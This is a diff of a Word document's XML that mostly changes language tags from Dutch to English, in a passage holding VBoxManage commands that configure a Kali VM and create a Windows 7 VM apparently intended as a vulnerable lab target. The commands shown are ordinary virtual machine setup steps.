+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>VBoxManage</w:t>
@@ -8202,7 +6311,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -8211,7 +6320,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storageattach</w:t>
       </w:r>
@@ -8220,7 +6329,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
       </w:r>
@@ -8229,7 +6338,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storagectl</w:t>
       </w:r>
@@ -8238,7 +6347,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'SATA' --port 1 --device 0 --type </w:t>
       </w:r>
@@ -8247,7 +6356,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>dvddrive</w:t>
       </w:r>
@@ -8256,34 +6365,16 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VirtualBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\VirtualBox\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxGuestAdditions.iso</w:t>
       </w:r>
@@ -8292,7 +6383,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -8302,59 +6393,41 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Define</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> boot order</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Define boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -8363,7 +6436,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -8372,7 +6445,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
       </w:r>
@@ -8381,33 +6454,51 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 dvd --boot3 none --boot4 none</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Start Kali VM</w:t>
       </w:r>
@@ -8417,15 +6508,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -8434,7 +6525,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -8443,7 +6534,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>startvm</w:t>
       </w:r>
@@ -8452,33 +6543,43 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --type gui</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Start-Sleep 10</w:t>
       </w:r>
@@ -8488,23 +6589,23 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -8514,50 +6615,84 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># 3. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Create</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Windows VM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 3. Create Windows VM for vulnerability) | +- 15min</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Register VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -8566,77 +6701,78 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>) | +- 15min</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t># Register VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>createvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --name $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ostype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'Windows7_64' --register</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Set VM settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -8645,7 +6781,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -8654,88 +6790,168 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>createvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --name $WINDOWS_7_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ostype</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'Windows7_64' --register</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Set VM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>settings</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cpus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>graphicscontroller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vboxsvga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --nat-network1 $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add a SATA storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -8744,7 +6960,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -8753,7 +6969,257 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --controller </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>IntelAHCI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
